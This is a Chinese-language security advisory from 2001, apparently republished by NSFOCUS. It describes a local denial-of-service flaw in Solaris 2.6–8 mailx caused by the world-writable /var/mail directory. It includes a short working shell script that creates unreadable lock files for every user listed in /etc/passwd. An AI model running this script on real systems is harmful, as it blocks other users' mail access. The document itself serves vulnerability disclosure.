安全研究

安全漏洞
Solaris mailx 锁文件拒绝服务攻击

发布日期:2001-01-06
更新日期:2001-01-06

受影响系统:


    Sun Solaris 8.0
    Sun Solaris 7.0
    Sun Solaris 2.6
描述:

mailx 是绝大多数Unix操作系统上都有的一种Mail User Agent。Solaris携带的mailx
存在一些设计上的问题。缺省情况下,/var/mail目录是全局可写的。当
/var/mail/$LOGNAME.lock文件存在的时候,相应用户无法在此使用mailx。恶意的本
地用户可以提前建立任意用户对应的锁文件,从而导致相应用户无法正常使用mailx。

<* 来源:optyx (optyx@uberhax0r.net) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


下列测试程序来自 optyx (optyx@uberhax0r.net)

-------------------------------------
#!/bin/sh
# Solaris mailx(1) username.lock proof of theory
# makes mailx not work for all users except
# those that can erase the lockfile
# even so mailx will hang for a long time
# Tested on Solaris 2.6, 7, 8
# by Optyx <optyx@uberhax0r.net>
# http://www.uberhax0r.net
echo "mailx-lock by optyx. http://www.uberhax0r.net"
for x in `cat /etc/passwd | cut -d':' -f1`;do
touch /var/mail/$x.lock
chmod 0 /var/mail/$x.lock
done
-------------------------------------


建议:

厂商补丁:

暂无

浏览次数:4432
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障